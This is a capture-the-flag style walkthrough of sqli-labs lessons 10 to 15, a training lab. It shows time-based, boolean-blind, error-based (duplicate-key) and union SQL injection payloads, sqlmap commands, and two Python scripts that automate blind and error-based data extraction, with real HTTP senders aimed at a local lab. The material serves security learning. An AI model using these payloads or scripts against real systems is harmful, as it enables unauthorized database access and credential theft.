Less-10 GET - Blind - Time based - double quotes (time-based blind injection, double-quote string)
Whatever you put in the parameter, the page returns the same content (the output is suppressed), so there is no boolean or error signal to read. The only remaining channel is time: make the query sleep when a condition holds and measure the response delay.
Confirm the injection point. The query closes the id value with double quotes, so the closer is `"` (the stray `''` in the original notes is a garbled `"`):
?id=1" and sleep(3) --+
The page takes about 3 seconds longer to respond, so the injection works. Measure a baseline first: the delay has to be clearly larger than the page's normal response time, or network jitter will give false positives.
Extracting the database name. First the length, then one character at a time:
?id=1" and if(length(database())=4 , sleep(3), 1) --+
No delay with 4; with ?id=1" and if(length(database())=8 , sleep(3), 1) --+ the response is clearly delayed, so the database name is 8 characters long.
?id=1" and if(left(database(),1)='s' , sleep(3), 1) --+ delays, so the first character of the name is 's'.
Continuing the same way up to ?id=1" and if(left(database(),8)='security' , sleep(3), 1) --+ confirms the database name is 'security'.
Extracting table names:
?id=1" and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' , sleep(3), 1) --+
`limit x,1` selects a single table name at 0-based offset x (limit 1,1 is the second row), and each name is brute-forced the same way as the database name. The first table name that came out was referer; the third table turned out to be users, clearly the user-information table.
Targeted extraction of the password and username columns. This is slow by hand; the two columns that finally came out are the ones below. The column name is read from information_schema.columns, selecting one row per offset with `limit n,1` and comparing its leading characters:
?id=1" and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password', sleep(3), 1) --+
That delays, giving password. Changing the offset in `limit n,1` and the compared string finds the other column the same way (the original notes repeated the password payload verbatim here; the template is):
?id=1" and if(left((select column_name from information_schema.columns where table_name='users' limit n,1),8)='username', sleep(3), 1) --+
That gives username.
Less-11 POST - Error Based - Single quotes- String (error-based POST injection, single-quote string)
The form is submitted by POST, so the parameters are easiest to manipulate by capturing the request in Burp Suite (the Community edition's throttling makes this slow, but it works):
set the browser proxy, capture the login request, send it to Repeater, and modify the POST parameters there. The page echoes the MySQL error, which is what makes it error-based rather than blind.
Less-12 POST - Error Based - Double quotes- String-with twist (error-based POST injection, double-quote string with a twist)
The approach is essentially the same as Less-11, with the closer changed to match the double-quoted string.
sqlmap also handles this one. Note that `-r` expects a saved raw request file (e.g. the POST request copied out of Burp), not a URL; the original notes passed a URL to `-r`, which sqlmap will not accept. With the request saved as request.txt (placeholder name):
python sqlmap.py -r request.txt --technique E --dbms mysql --batch -v 0
Alternatively target the URL directly with `-u` and supply the POST body with `--data`.
Less-13 POST - Double Injection - Single quotes- String -twist (POST injection, single-quote string with parenthesis, double-query / duplicate-key error)
Enumerate databases, stepping the offset in `limit n,1` one row at a time. The query is closed with `')`, and the floor(rand()*2) + group by trick forces a duplicate-key error whose message leaks the selected value:
') or (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#
Enumerate tables, again stepping `limit n,1`:
') or (select 1 from (select count(*),concat((select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#
Dump the rows, still stepping `limit n,1`:
') or (select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)#
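The three payloads above differ only in the inner subquery and the offset, and every answer arrives inside a MySQL "Duplicate entry '...' for key 'group_key'" error (the collision happens because rand() is evaluated once when the temporary group-by table is probed and again when the row is inserted, so with a few source rows a key that was absent at the probe can already exist at the insert). The following script, added here as an example and not code from the original notes, builds the payload for any subquery, parses the leaked value out of the error, and walks the offsets until the error stops carrying a value. The POST field names `uname`/`passwd`/`submit` are an assumption about the lab form, and `make_fake_app` is a constructed stand-in for the vulnerable page so the demo runs offline; `make_post_sender` is what you would use against the real page.

```python
"""Error-based (duplicate-key) extraction for the Less-13 payload shape.
Added example; field names uname/passwd/submit and the offline fake responder are assumptions."""
import re
import urllib.parse
import urllib.request

# MySQL 5.x prints "for key 'group_key'", MySQL 8.0 "for key '<group_key>'"; match either.
DUP_ENTRY = re.compile(r"Duplicate entry '(.*?)' for key '[^']*'")


def dup_key_payload(expr, n):
    """Wrap a one-column subquery in the floor(rand()*2)/group by trick, selecting row `n`
    with limit n,1. A ';' terminator is appended (as the original payloads do) so the
    rand() digit that MySQL glues onto the key can be split off without ambiguity."""
    return ("') or (select 1 from (select count(*),concat((" + expr +
            f" limit {n},1),';',floor(rand()*2)) as x "
            "from information_schema.tables group by x) as a)#")


def leaked_value(body):
    """Value leaked by the Duplicate entry error in a response body, or None if no error is shown."""
    m = DUP_ENTRY.search(body)
    if not m:
        return None
    return m.group(1).rsplit(";", 1)[0]   # drop the trailing rand() digit


def dump_column(send, expr, max_rows=50):
    """Read rows of `expr` at offsets 0..max_rows-1 until the error stops carrying a value.
    rand() is random, so a single request can (rarely) fail to collide; retry before
    concluding the rows are exhausted."""
    rows = []
    for n in range(max_rows):
        value = None
        for _ in range(3):
            value = leaked_value(send(dup_key_payload(expr, n)))
            if value:
                break
        if not value:
            break
        rows.append(value)
    return rows


def make_post_sender(url):
    """Real transport: POST the payload in the uname field and return the page body."""
    def send(payload):
        data = urllib.parse.urlencode({"uname": payload, "passwd": "x", "submit": "Submit"}).encode()
        return urllib.request.urlopen(url, data=data, timeout=10).read().decode(errors="replace")
    return send


def make_fake_app(values):
    """Constructed stand-in for the vulnerable page (offline demo only): reads the limit offset
    out of the payload and answers with the error text MySQL would produce for that row."""
    def send(payload):
        n = int(re.search(r"limit (\d+),1", payload).group(1))
        if n < len(values):
            return f"<b>Duplicate entry '{values[n]};1' for key 'group_key'</b>"
        return "<html>login failed, no SQL error shown</html>"
    return send


def demo_offline():
    """Run the extraction loop against constructed sample data."""
    send = make_fake_app(["information_schema", "security"])
    return dump_column(send, "select schema_name from information_schema.schemata")


if __name__ == "__main__":
    print(demo_offline())
```

Against the lab, replace `make_fake_app(...)` with `make_post_sender("http://localhost/sqli-labs-master/Less-13/")` and pass the table or row subquery from the payloads above (without its `limit` clause, which `dup_key_payload` appends).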
Less-14 POST - Double Injection - Double quotes- String -twist (POST injection, double-quote string, double-query / duplicate-key error; the original notes repeated the Less-13 title here)
I found sqlmap to be the fastest and most convenient here.
As in Less-12, `-r` takes a saved raw request file (request.txt is a placeholder name), not a URL:
python sqlmap.py -r request.txt --technique E --dbms mysql --batch -v 0
Less-15 POST - Blind- Boolean/time Based - Single quotes (boolean/time-based blind POST injection, single-quote string)
Adding a single quote breaks the query but no error is shown, so this is blind. The payload ' or 1=1 or '1'='2 (closing with ') was also tried) gives a successful login.
Boolean blind injection: send ' or 1=(if(substr(version(),1,1)=5,1,0)) or '1'='2
The login succeeds, which means 1=(if(substr(version(),1,1)=5,1,0)) is true: the MySQL version starts with 5.
Every further probe works the same way, substituting the condition to test for the 1=1 part; the only signal is whether the login page shows success or failure.
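Both Less-10 (time oracle over GET) and Less-15 (login success/failure oracle over POST) reduce to the same loop: ask a yes/no question about one character of a subquery result and read the answer from the side channel. The script below, an added example rather than code from the original notes, does that with a pluggable oracle and a binary search over the ASCII range (about seven queries per character instead of one per candidate, which matters when each query costs a 3-second sleep). `make_time_oracle` and `make_login_oracle` are the two transports for the lab pages; `make_local_oracle` evaluates the same conditions in SQLite so the demo runs offline. The POST field names `uname`/`passwd`/`submit`, the success marker string, and the sample rows in `demo_offline` are assumptions and constructed data.

```python
"""Blind SQLi character extraction with a pluggable oracle.
Added example; the lab field names, success marker and sample rows are assumptions."""
import sqlite3
import time
import urllib.parse
import urllib.request


def char_condition(expr, pos, threshold, ascii_fn="ascii"):
    """SQL boolean: is character `pos` (1-based) of the scalar subquery `expr` > `threshold`?
    Past the end of the string substr() yields '' and MySQL's ascii('') is 0 (SQLite's
    unicode('') is NULL), so the search converges to 0 there and signals the end."""
    return f"{ascii_fn}(substr(({expr}),{pos},1))>{threshold}"


def extract_string(oracle, expr, max_len=64, ascii_fn="ascii"):
    """Recover `expr` character by character; each character is a binary search on [0,127]."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(char_condition(expr, pos, mid, ascii_fn)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:            # ran past the end of the string
            break
        out += chr(lo)
    return out


def make_time_oracle(url, closer='"', delay=3):
    """Less-10 style GET oracle: true iff the page takes at least `delay` seconds.
    Measure the normal response time first and choose `delay` well above it."""
    def oracle(cond):
        payload = f"1{closer} and if(({cond}),sleep({delay}),1) -- "
        t0 = time.monotonic()
        urllib.request.urlopen(f"{url}?id={urllib.parse.quote(payload)}", timeout=delay * 5).read()
        return time.monotonic() - t0 >= delay
    return oracle


def make_login_oracle(url, success_marker, closer="'"):
    """Less-15 style POST oracle: true iff the response contains something only a
    successful login shows (pass the text or image name you observed as `success_marker`)."""
    def oracle(cond):
        payload = f"{closer} or ({cond}) or '1'='2"
        data = urllib.parse.urlencode({"uname": payload, "passwd": "x", "submit": "Submit"}).encode()
        body = urllib.request.urlopen(url, data=data, timeout=10).read().decode(errors="replace")
        return success_marker in body
    return oracle


def make_local_oracle(conn):
    """Offline stand-in: evaluate the condition directly in SQLite (NULL counts as false)."""
    def oracle(cond):
        return bool(conn.execute(f"SELECT ({cond})").fetchone()[0])
    return oracle


def demo_offline():
    """Constructed sample table; SQLite has unicode() where MySQL has ascii()."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1,'Dumb','Dumb'),(2,'Angelina','I-kill-you');
    """)
    oracle = make_local_oracle(conn)
    return extract_string(oracle, "select username from users limit 1 offset 1", ascii_fn="unicode")


if __name__ == "__main__":
    print(demo_offline())
```

Against the lab, `extract_string(make_time_oracle("http://localhost/sqli-labs-master/Less-10/"), "database()")` replays the Less-10 steps above, and the same call with `make_login_oracle("http://localhost/sqli-labs-master/Less-15/", "<observed success marker>")` replays Less-15; the subqueries for table and column names are the ones used in the payloads above.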
Union injection to read the databases, tables, columns, and then the usernames and passwords. These are GET-style payloads for a page that echoes query output (Less-1 style); Less-15 itself only shows login success or failure, so on that page the data would not be displayed and the blind technique above is what actually applies:
?id=-1' union select 1,group_concat(schema_name),1 from information_schema.schemata --+
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
?id=-1' union select 1,group_concat(concat_ws(':',username,password)),3 from users --+